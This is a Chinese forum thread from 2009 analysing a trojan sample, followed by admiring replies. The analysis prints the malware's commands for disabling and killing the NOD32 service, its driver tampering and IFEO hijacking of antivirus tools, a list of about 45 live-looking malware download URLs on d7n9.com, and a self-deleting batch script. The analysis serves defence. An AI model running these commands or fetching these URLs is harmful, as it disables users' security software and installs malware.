卡饭上的马分析 by smallyou93[LSG]

smallyou93 · 发表于 2009-4-26 03:11

本帖最后由是昔流芳于 2011-2-11 15:49 编辑

样本来源：http://bbs.52pojie.cn/thread-23199-1-1.html

1.调用CMD执行以下命令：
cmd /c sc config ekrn start= disabled
cmd.exe /c taskkill.exe /im ekrn.exe /f

明显针对Nod....

2.释放文件%SystemRoot%\System32\killdll.dll

反复写入该文件并加载
%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\killdll.dll testall

篡改驱动
%SystemRoot%\System32\Drivers\aec.SYS
%SystemRoot%\System32\Drivers\AsyncMac.sys

加载，恢复SSDT

添加IFEO，挟持多种安软

删除启动项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

最后删除自身

3.释放文件%SystemRoot%\??????_xeex.exe

下载木马群。。。。
http://wgg.6d2n.com/01/fz.txt

1:http://u8.d7n9.com/sb/ok.exe
1:http://u2.d7n9.com/la/L1.exe
1:http://u2.d7n9.com/la/L3.exe
1:http://u2.d7n9.com/la/L4.exe
1:http://u2.d7n9.com/la/L5.exe
1:http://u2.d7n9.com/la/L6.exe
1:http://u2.d7n9.com/la/L7.exe
1:http://u3.d7n9.com/lm/S10.exe
1:http://u3.d7n9.com/lm/S1.exe
1:http://u3.d7n9.com/lm/S8.exe
1:http://u3.d7n9.com/lm/S2.exe
1:http://u3.d7n9.com/lm/S12.exe
1:http://u3.d7n9.com/lm/S14.exe
1:http://u3.d7n9.com/lm/S01.exe
1:http://u2.d7n9.com/lm/M5.exe
1:http://u2.d7n9.com/lm/M39.exe
1:http://u2.d7n9.com/lm/M25.exe
1:http://u2.d7n9.com/lm/M4.exe
1:http://u2.d7n9.com/lm/M35.exe
1:http://u2.d7n9.com/lm/M33.exe
1:http://u2.d7n9.com/lm/M01.exe
1:http://u3.d7n9.com/lm/S15.exe
1:http://u3.d7n9.com/lm/S16.exe
1:http://u3.d7n9.com/lm/S21.exe
1:http://u2.d7n9.com/lm/M37.exe
1:http://u2.d7n9.com/lm/M15.exe
1:http://u2.d7n9.com/lm/M24.exe
1:http://u2.d7n9.com/lm/M38.exe
1:http://u2.d7n9.com/lm/M23.exe
1:http://u2.d7n9.com/lm/M02.exe
1:http://u3.d7n9.com/lm/S13.exe
1:http://u3.d7n9.com/lm/S17.exe
1:http://u3.d7n9.com/lm/S20.exe
1:http://u3.d7n9.com/lm/S21.exe
1:http://u3.d7n9.com/lm/S11.exe
1:http://u7.d7n9.com/cj/1a.exe
1:http://u9.d7n9.com/cj/a2.exe
1:http://u9.d7n9.com/cj/a10.exe
1:http://u9.d7n9.com/cj/a6.exe
1:http://u7.d7n9.com/cj/a9.exe
1:http://u7.d7n9.com/cj/csj.exe
1:http://u0.d7n9.com/cj/a8.exe
1:http://u8.d7n9.com/sb/01.exe
1:http://u0.d7n9.com/cj/sb1.exe

4.释放文件%SystemRoot%\System32\Drivers\pcidump.sys
安装驱动并加载恢复SSDT

_uok.bat（可能是随机名）
删除自身

:Repeat
del "C:\DOCUME~1\SMALLY~1\桌面\Actvev.exe"
if exist "C:\DOCUME~1\SMALLY~1\桌面\Actvev.exe" goto Repeat
rmdir C:\DOCUME~1\SMALLY~1\桌面
del "C:\DOCUME~1\SMALLY~1\LOCALS~1\Temp\_uok.bat"

smallyou93 · 发表于 2009-4-26 03:12

篡改驱动
%SystemRoot%\System32\Drivers\aec.SYS
%SystemRoot%\System32\Drivers\AsyncMac.sys

加载，恢复SSDT

启动进程%SystemRoot%\??????_xeex.exe

%SystemRoot%\System32\Drivers\pcidump.sys
安装驱动并加载恢复SSDT

关键是驱动，如果看守好drivers目录的话，这病毒就没戏了

Hmily · 发表于 2009-4-26 12:26

膜拜93大牛分析~[s:41]

vistalong · 发表于 2009-4-26 14:03

继续膜拜93大牛

733 · 发表于 2009-4-27 11:27

谢谢老大！！！

frozenrain · 发表于 2009-4-29 18:22

:D都分析这个马了

lackiy · 发表于 2009-4-29 21:51

哇。分析的好厉害

冷血书生 · 发表于 2009-4-30 13:12

继续又继续膜拜93大牛

小瞬子 · 发表于 2009-4-30 13:32

:$我想学，谁教我

王的男人 · 发表于 2009-5-7 11:18

我也想学哈哈哈哈

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] 卡饭上的马 分析 by smallyou93[LSG]

[PC样本分析] 卡饭上的马分析 by smallyou93[LSG]